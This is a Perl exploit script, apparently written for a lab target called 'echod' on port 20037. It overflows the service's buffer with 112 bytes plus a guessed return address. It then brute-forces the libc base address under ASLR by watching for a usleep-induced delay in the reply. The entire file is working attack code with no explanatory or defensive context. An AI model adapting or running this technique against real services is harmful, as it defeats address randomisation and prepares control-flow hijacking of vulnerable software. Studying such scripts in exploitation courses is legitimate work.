#!/usr/bin/env perl
use strict;
use warnings;

use IO::Socket;
use IO::Select;

=head1 DESCRIPTION

=cut

my $host = shift || "localhost";

my $buffer;
my $out;
my $socket;
my $b;
my $s;

my $base  = 0xb7e70000;
my $inc   = 0x00001000;
my $max   = 0xb7ffffff;

# my $base  = 0xf7dc0000;
# my $inc   = 0x00001000;
# my $max   = 0xf7efffff;

my $pageoff = 0x9f0;

my $sleep = 0x01010101;
my $delta = 0x000ce9f0;

my $reta = $base + $pageoff;

autoflush STDOUT 1;

while ($reta < $max) {

    $socket = IO::Socket->new(
        Domain   => AF_INET,
        PeerAddr => $host,
        PeerPort => "20037",
        Proto    => 'tcp'
    );

    die("Unable to connect -- is echod running?") unless $socket;

    $buffer = "x" x 112 . pack("VV", $reta, $sleep);

    # printf "0x%08x...\n", $reta;

    $socket->syswrite( $buffer, length($buffer) );

    $s = IO::Select->new;
    $s->add($socket);
    my @s = $s->can_read(1);

    if(!scalar @s) {
        printf "Found probable usleep at address 0x%08x, ", $reta;
        printf "libc at 0x%08x\n", $reta - $delta;
    }

    $reta += $inc;
}
